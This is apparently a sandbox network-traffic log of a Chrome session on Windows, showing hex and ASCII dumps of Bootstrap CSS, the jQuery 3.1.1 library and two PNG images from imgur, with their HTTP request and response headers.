2025-03-24 13:42:19 UTC	16384	IN	Data Raw: 3b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 35 34 35 62 36 32 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 34 65 35 35 35 62 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 74 6e 2d 73 65 63 6f 6e 64 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 2e 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 0d 0a 20 20 20 20 2e 62 74 6e 2d 73 65 63 6f 6e 64 61 72 79 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 6e 6f 74 28 2e 64 69 73 61 62 6c 65 64 29 3a 61 63 74 69 76 65 3a 66 6f 63 75 73 2c 0d 0a 20 20 20 20 2e 73 68 6f 77 3e 2e 62 74 6e 2d 73 65 63 6f 6e 64 61 72 79 2e 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 3a 66 6f 63 75 73 20 7b Data Ascii: ; background-color: #545b62; border-color: #4e555b } .btn-secondary:not(:disabled):not(.disabled).active:focus, .btn-secondary:not(:disabled):not(.disabled):active:focus, .show>.btn-secondary.dropdown-toggle:focus {
2025-03-24 13:42:19 UTC	16384	IN	Data Raw: 61 70 73 65 2e 73 68 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 74 72 2e 63 6f 6c 6c 61 70 73 65 2e 73 68 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 2d 72 6f 77 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 74 62 6f 64 79 2e 63 6f 6c 6c 61 70 73 65 2e 73 68 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 2d 72 6f 77 2d 67 72 6f 75 70 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 63 6f 6c 6c 61 70 73 69 6e 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 6f 76 Data Ascii: apse.show { display: block } tr.collapse.show { display: table-row } tbody.collapse.show { display: table-row-group } .collapsing { position: relative; height: 0; ov
2025-03-24 13:42:19 UTC	16384	IN	Data Raw: 72 61 64 69 6f 20 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 3a 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 2c 25 33 43 73 76 67 20 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 27 20 76 69 65 77 42 6f 78 3d 27 2d 34 20 2d 34 20 38 20 38 27 25 33 45 25 33 43 63 69 72 63 6c 65 20 72 3d 27 33 27 20 66 69 6c 6c 3d 27 25 32 33 66 66 66 27 2f 25 33 45 25 33 43 2f 73 76 67 25 33 45 22 29 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 Data Ascii: radio .custom-control-input:checked~.custom-control-label::after { background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='-4 -4 8 8'%3E%3Ccircle r='3' fill='%23fff'/%3E%3C/svg%3E") }
2025-03-24 13:42:19 UTC	16384	IN	Data Raw: 64 20 7b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 77 72 61 70 3a 20 6e 6f 77 72 61 70 3b 0d 0a 20 20 20 20 20 20 20 20 66 6c 65 78 2d 77 72 61 70 3a 20 6e 6f 77 72 61 70 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 20 2e 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 77 65 62 6b 69 74 2d 62 6f 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 2d 6d 73 2d 66 6c 65 78 62 6f 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 72 65 66 65 72 72 Data Ascii: d { -ms-flex-wrap: nowrap; flex-wrap: nowrap } .navbar-expand .navbar-collapse { display: -webkit-box !important; display: -ms-flexbox !important; display: flex !important; -ms-flex-preferr
2025-03-24 13:42:19 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 39 65 63 65 66 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 2e 33 72 65 6d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 35 37 36 70 78 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 2e 6a 75 6d 62 6f 74 72 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 34 72 65 6d 20 32 72 65 6d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 6a 75 6d 62 6f 74 72 6f 6e 2d 66 6c 75 69 64 20 7b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b Data Ascii: background-color: #e9ecef; border-radius: .3rem } @media (min-width:576px) { .jumbotron { padding: 4rem 2rem } } .jumbotron-fluid { padding-right: 0; padding-left: 0;
2025-03-24 13:42:19 UTC	16384	IN	Data Raw: 74 5e 3d 72 69 67 68 74 5d 20 2e 61 72 72 6f 77 2c 0d 0a 20 20 20 20 2e 62 73 2d 74 6f 6f 6c 74 69 70 2d 72 69 67 68 74 20 2e 61 72 72 6f 77 20 7b 0d 0a 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 2e 34 72 65 6d 3b 0d 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 2e 38 72 65 6d 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 2e 62 73 2d 74 6f 6f 6c 74 69 70 2d 61 75 74 6f 5b 78 2d 70 6c 61 63 65 6d 65 6e 74 5e 3d 72 69 67 68 74 5d 20 2e 61 72 72 6f 77 3a 3a 62 65 66 6f 72 65 2c 0d 0a 20 20 20 20 2e 62 73 2d 74 6f 6f 6c 74 69 70 2d 72 69 67 68 74 20 2e 61 72 72 6f 77 3a 3a 62 65 66 6f 72 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 Data Ascii: t^=right] .arrow, .bs-tooltip-right .arrow { left: 0; width: .4rem; height: .8rem } .bs-tooltip-auto[x-placement^=right] .arrow::before, .bs-tooltip-right .arrow::before { right: 0; border

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49714	151.101.2.137	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:42:20 UTC	539	OUT	GET /jquery-3.1.1.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:42:21 UTC	562	IN	HTTP/1.1 200 OK Connection: close Content-Length: 86709 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-152b5" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Accept-Ranges: bytes Date: Mon, 24 Mar 2025 13:42:20 GMT Via: 1.1 varnish Age: 1752025 X-Served-By: cache-lga21984-LGA X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1742823741.979585,VS0,VE1 Vary: Accept-Encoding
2025-03-24 13:42:21 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 Data Ascii: /! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
2025-03-24 13:42:21 UTC	16384	IN	Data Raw: 3d 3d 3d 6d 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 74 26 26 28 73 26 26 28 6c 3d 6d 5b 75 5d 7c 7c 28 6d 5b 75 5d 3d 7b 7d 29 2c 6b 3d 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6c 5b 6d 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 2c 6b 5b 61 5d 3d 5b 77 2c 74 5d 29 2c 6d 3d 3d 3d 62 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 74 2d 3d 65 2c 74 3d 3d 3d 64 7c 7c 74 25 64 3d 3d 3d 30 26 26 74 2f 64 3e 3d 30 7d 7d 7d 2c 50 53 45 55 44 4f 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 65 3d 64 2e 70 73 65 75 64 6f 73 5b 61 5d 7c 7c 64 2e 73 65 74 46 69 6c 74 65 72 73 5b 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 67 61 2e 65 72 72 6f 72 28 22 75 6e 73 75 70 70 6f 72 74 65 64 20 70 73 65 75 64 6f 3a 20 22 2b 61 29 3b 72 65 74 Data Ascii: ===m.nodeType)&&++t&&(s&&(l=m[u]\|\|(m[u]={}),k=l[m.uniqueID]\|\|(l[m.uniqueID]={}),k[a]=[w,t]),m===b))break;return t-=e,t===d\|\|t%d===0&&t/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]\|\|d.setFilters[a.toLowerCase()]\|\|ga.error("unsupported pseudo: "+a);ret
2025-03-24 13:42:21 UTC	16384	IN	Data Raw: 64 3d 31 2c 55 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 62 7c 7c 28 62 3d 7b 7d 2c 54 28 61 29 26 26 28 61 2e 6e 6f 64 65 54 79 70 65 3f 61 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 62 3a 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 61 2c 74 68 69 73 2e 65 78 70 61 6e 64 6f 2c 7b 76 61 6c 75 65 3a 62 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 29 29 29 2c 62 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 2c 65 3d 74 68 69 73 2e 63 61 63 68 65 28 61 29 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 29 65 5b 72 2e 63 61 6d 65 6c 43 61 73 65 Data Ascii: d=1,U.prototype={cache:function(a){var b=a[this.expando];return b\|\|(b={},T(a)&&(a.nodeType?a[this.expando]=b:Object.defineProperty(a,this.expando,{value:b,configurable:!0}))),b},set:function(a,b,c){var d,e=this.cache(a);if("string"==typeof b)e[r.camelCase
2025-03-24 13:42:21 UTC	16384	IN	Data Raw: 65 26 26 39 21 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 28 74 68 69 73 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 61 29 7d 29 7d 2c 6e 75 6c 6c 2c 61 2c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7d 2c 61 70 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 31 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 62 3d 44 61 28 74 68 69 73 2c 61 29 3b 62 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 7d 29 7d 2c 70 72 65 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 49 61 28 Data Ascii: e&&9!==this.nodeType\|\|(this.textContent=a)})},null,a,arguments.length)},append:function(){return Ia(this,arguments,function(a){if(1===this.nodeType\|\|11===this.nodeType\|\|9===this.nodeType){var b=Da(this,a);b.appendChild(a)}})},prepend:function(){return Ia(
2025-03-24 13:42:21 UTC	16384	IN	Data Raw: 73 2e 73 65 6c 65 63 74 65 64 3d 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 62 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 6e 75 6c 6c 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 62 26 26 28 62 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 62 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 29 7d 7d 29 2c 72 2e 65 61 63 68 28 5b 22 74 61 62 49 6e 64 65 78 22 2c 22 72 65 61 64 4f 6e 6c 79 22 2c 22 6d 61 78 4c 65 6e 67 74 68 22 2c 22 63 65 6c 6c 53 70 61 63 Data Ascii: s.selected={get:function(a){var b=a.parentNode;return b&&b.parentNode&&b.parentNode.selectedIndex,null},set:function(a){var b=a.parentNode;b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex)}}),r.each(["tabIndex","readOnly","maxLength","cellSpac
2025-03-24 13:42:21 UTC	4789	IN	Data Raw: 3d 62 2e 6a 73 6f 6e 70 21 3d 3d 21 31 26 26 28 52 62 2e 74 65 73 74 28 62 2e 75 72 6c 29 3f 22 75 72 6c 22 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 2e 64 61 74 61 26 26 30 3d 3d 3d 28 62 2e 63 6f 6e 74 65 6e 74 54 79 70 65 7c 7c 22 22 29 2e 69 6e 64 65 78 4f 66 28 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 29 26 26 52 62 2e 74 65 73 74 28 62 2e 64 61 74 61 29 26 26 22 64 61 74 61 22 29 3b 69 66 28 68 7c 7c 22 6a 73 6f 6e 70 22 3d 3d 3d 62 2e 64 61 74 61 54 79 70 65 73 5b 30 5d 29 72 65 74 75 72 6e 20 65 3d 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 3d 72 2e 69 73 46 75 6e 63 74 69 6f 6e 28 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 61 63 6b 29 3f 62 2e 6a 73 6f 6e 70 43 61 6c 6c 62 Data Ascii: =b.jsonp!==!1&&(Rb.test(b.url)?"url":"string"==typeof b.data&&0===(b.contentType\|\|"").indexOf("application/x-www-form-urlencoded")&&Rb.test(b.data)&&"data");if(h\|\|"jsonp"===b.dataTypes[0])return e=b.jsonpCallback=r.isFunction(b.jsonpCallback)?b.jsonpCallb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49715	199.232.196.193	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:42:21 UTC	587	OUT	GET /0HdPsKK.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:42:21 UTC	756	IN	HTTP/1.1 200 OK Connection: close Content-Length: 5579 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 02:14:56 GMT ETag: "28a8812c3aaf8af83ba5c83c58750528" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: YYTlmwzZRLqXoGXppDaHC3Gtdw92u8SHfCwF9eVUy31VA6g75HGzNw== cache-control: public, max-age=31536000 Accept-Ranges: bytes Age: 2526799 Date: Mon, 24 Mar 2025 13:42:21 GMT X-Served-By: cache-iad-kiad7000021-IAD, cache-lga21962-LGA X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 11253, 0 X-Timer: S1742823742.880443,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-03-24 13:42:21 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 55 08 06 00 00 00 a6 46 3a 96 00 00 15 92 49 44 41 54 78 9c ec 9d 0b 94 5b 55 bd ff bf bf 73 92 4c 87 4e 0b 14 da 22 85 ce b4 50 40 d4 5a 44 84 76 48 ce 49 67 0a 88 2f a4 88 8a 02 ca fa 03 fe 51 c1 85 02 2e 04 9a b2 00 29 78 e1 e2 c5 07 57 91 87 d6 8b 08 f5 a2 82 80 b4 d9 c9 cc 14 aa 94 87 0f b4 0a a5 14 4a 6b a9 d4 76 66 3a d3 49 72 7e 77 9d 24 33 ce 24 fb 24 27 cf 33 e9 ec cf 5a b3 26 d9 cf ef 49 b2 7f fb bd b7 0f 0a c5 04 a1 ef c6 39 33 91 e4 d3 99 71 1a 33 e6 10 61 0a c0 53 19 98 4a a0 96 7f 87 e4 1d 0c fc 8e 40 bf d7 60 3d 9b 0a a4 9e 9e 7a f5 96 7f 7a a9 bd 56 90 d7 02 14 8a 5a 32 70 c3 9c d6 64 d2 ba 08 a0 0f 01 78 6f 05 49 fd 01 b0 1e 06 f0 d0 94 c8 e6 97 aa 28 d1 53 94 01 50 ec Data Ascii: PNGIHDRUF:IDATx[UsLN"P@ZDvHIg/Q.)xWJkvf:Ir~w$3$$'3Z&I93q3aSJ@`=zzVZ2pdxoI(SP
2025-03-24 13:42:21 UTC	1371	IN	Data Raw: 34 f9 e0 31 ce b4 df 3b 6a 97 27 e1 a4 a1 ff 35 22 40 ec ba e2 41 15 0a 17 ec 5e d6 7a 35 11 be 61 ff 74 bd d6 d2 28 d0 7e 07 a2 f9 bc 95 d0 66 4a 06 e8 53 7b 91 78 ec 4c 20 59 bb 9b c3 fc 9c 3c 82 96 76 6f 2c 14 46 b5 00 14 05 e9 bd be cd 80 85 fb 01 cc f6 5a 4b 23 a1 1d 7c 04 9a 3f 7b 1f 68 ff 59 f2 00 7a 13 f4 a3 3e 8d d4 4b 77 d7 4c c3 10 e9 37 03 38 bb 50 18 35 08 a8 70 a4 2f d2 7a 0e 2c 7e 4a 15 fe d2 f0 7f e0 3c ec 77 f1 a3 ce 85 3f 0b cd fb 24 68 c6 09 35 d3 41 8c a5 fc ab c5 05 45 28 03 a0 90 b2 3b d2 b6 82 41 2b 01 52 ad 44 17 50 cb 74 f8 17 5d 84 c9 5f 5e 83 a6 0f 2e 07 7c 4d c5 e3 68 7e f8 da 6f 81 36 e7 63 35 12 45 5a 22 91 ba bc 60 90 da e4 ac 68 64 fa 96 b7 5d c6 8c ff f4 5a 47 4d b0 0b a6 a6 03 a4 a7 2f 1a a2 e1 d7 9a 96 fd 6f bf d7 d2 ff Data Ascii: 41;j'5"@A^z5at(~fJS{xL Y<vo,FZK#\|?{hYz>KwL78P5p/z,~J<w?$h5AE(;A+RDPt]_^.\|Mh~o6c5EZ"`hd]ZGM/o
2025-03-24 13:42:21 UTC	1371	IN	Data Raw: fa a6 69 7e 4b 08 51 93 93 32 42 a1 d0 22 22 ac c8 3d fc 9a 08 f6 e7 54 b6 01 20 c2 25 00 bd ab 48 98 31 0d 6c c3 30 77 12 e1 16 21 c4 cd 2e b3 69 a9 e4 fb 20 42 3f 80 3c 03 60 18 e1 eb 00 1c d1 dc dc bc 33 1c 0e ff 66 4c 17 20 14 0a cd 63 a6 f5 44 da 2d 00 1d 50 3c 13 5a a2 69 78 c4 34 cd 7b ca 15 5a 6d 4c d3 bc 9d 48 8b 3b 15 fe b1 d0 c1 00 dd 69 9a e1 67 82 c1 60 0d 2f 6c af 17 e9 e7 f9 8c a6 f1 6a c3 30 9f ec e8 e8 70 bc 12 6a 22 a0 69 da 97 e5 3e 74 b0 69 9a e7 d7 53 0b 11 1d 08 d0 37 0d 23 1c eb ec ec dc bf 9e 79 0f 63 18 c6 12 66 7a 06 e0 29 cc 34 c3 6e dd 8f 18 80 70 38 7c 3c 91 b6 9e 08 c7 96 9e 34 7d ce 30 c2 45 b7 3e 31 53 4d ef 21 30 4d f3 71 80 be 52 46 d4 13 75 5d 7f 6e f1 e2 c5 ad c5 02 32 b3 f4 19 9c dc 8b f9 d5 0a db 38 a7 52 a9 67 3b 3a Data Ascii: i~KQ2B""=T %H1l0w!.i B?<`3fL cD-P<Zix4{ZmLH;ig`/lj0pj"i>tiS7#ycfz)4np8\|<4}0E>1SM!0MqRFu]n28Rg;:
2025-03-24 13:42:21 UTC	1371	IN	Data Raw: e9 af 37 3e 22 6c 01 c6 4e 01 12 e1 7d c1 60 70 7a 57 57 97 b4 70 95 0b 33 51 0d 96 02 49 8f 5e 65 e6 25 00 d6 15 8a 18 0c 06 df 41 44 ef c9 75 27 42 a1 2f c7 69 d9 aa a3 c1 91 75 b3 b2 1a 77 15 d2 e7 44 21 63 e3 34 b7 cd 4c af 95 93 97 3b 3d e3 63 11 10 91 f6 c5 5c 37 66 fc c1 b2 ac 79 a6 69 ce cb 3a 49 47 fc 75 5d bf 14 40 91 be 75 35 e0 fb 84 10 05 c7 d7 90 5d 08 a4 eb d2 ad 3a 1b 8a 4f b9 f2 a0 5b 35 3e 66 ea 22 c2 82 5c 0f 5d d7 bf 0a c0 51 a8 69 9a 2d cc f8 1b 51 7e 6b 61 60 60 cf fe eb d6 ad ab d7 65 68 4f c9 9d e9 0b ed ed ed 77 f4 f4 f4 f4 3a 45 d4 75 5d ba 70 89 d9 f9 98 6c 22 da 29 5f ce a4 1d 59 40 e3 09 32 47 cb b2 a4 f7 b5 55 06 fd 87 dc dd 72 f8 9c 8a e1 66 1d 00 ff a3 bc b4 ab 47 38 1c 5e ca 8c 59 b9 ee 44 98 0f 50 b4 78 0a 74 7e 47 47 c7 Data Ascii: 7>"lN}`pzWWp3QI^e%ADu'B/iuwD!c4L;=c\7fyi:IGu]@u5]:O[5>f"\]Qi-Q~ka``ehOw:Eu]pl")_Y@2GUrfG8^YDPxt~GG
2025-03-24 13:42:21 UTC	95	IN	Data Raw: 4b b7 97 77 74 74 cc 4c a5 52 3f c9 f7 e1 bc 01 38 19 42 88 87 4c d3 8c e4 0f 6c 51 c1 c1 59 66 7c 57 72 26 a0 54 63 2c 16 5d 66 9a 66 22 b7 ac 11 01 93 26 4d 3a 56 b6 79 0b 99 59 80 de 0a 3e af 51 69 14 e6 ff 02 00 00 ff ff 5a 98 a3 a9 0f 7b c2 43 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: KwttLR?8BLlQYf\|Wr&Tc,]ff"&M:VyY>QiZ{CIENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49716	199.232.196.193	443	6752	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 13:42:21 UTC	587	OUT	GET /KAb5SEy.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-24 13:42:21 UTC	757	IN	HTTP/1.1 200 OK Connection: close Content-Length: 48869 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 13:35:05 GMT ETag: "8aa14660517f5460156fccc2199cf83c" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: ZMDtIIYNSizYrfDVWXb5ZuJtkSbNLszxoUAHUCL9zZz9IlMMufkJOg== cache-control: public, max-age=31536000 Accept-Ranges: bytes Age: 2575814 Date: Mon, 24 Mar 2025 13:42:21 GMT X-Served-By: cache-iad-kjyo7100129-IAD, cache-lga21922-LGA X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 14884, 0 X-Timer: S1742823742.878464,VS0,VE2 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
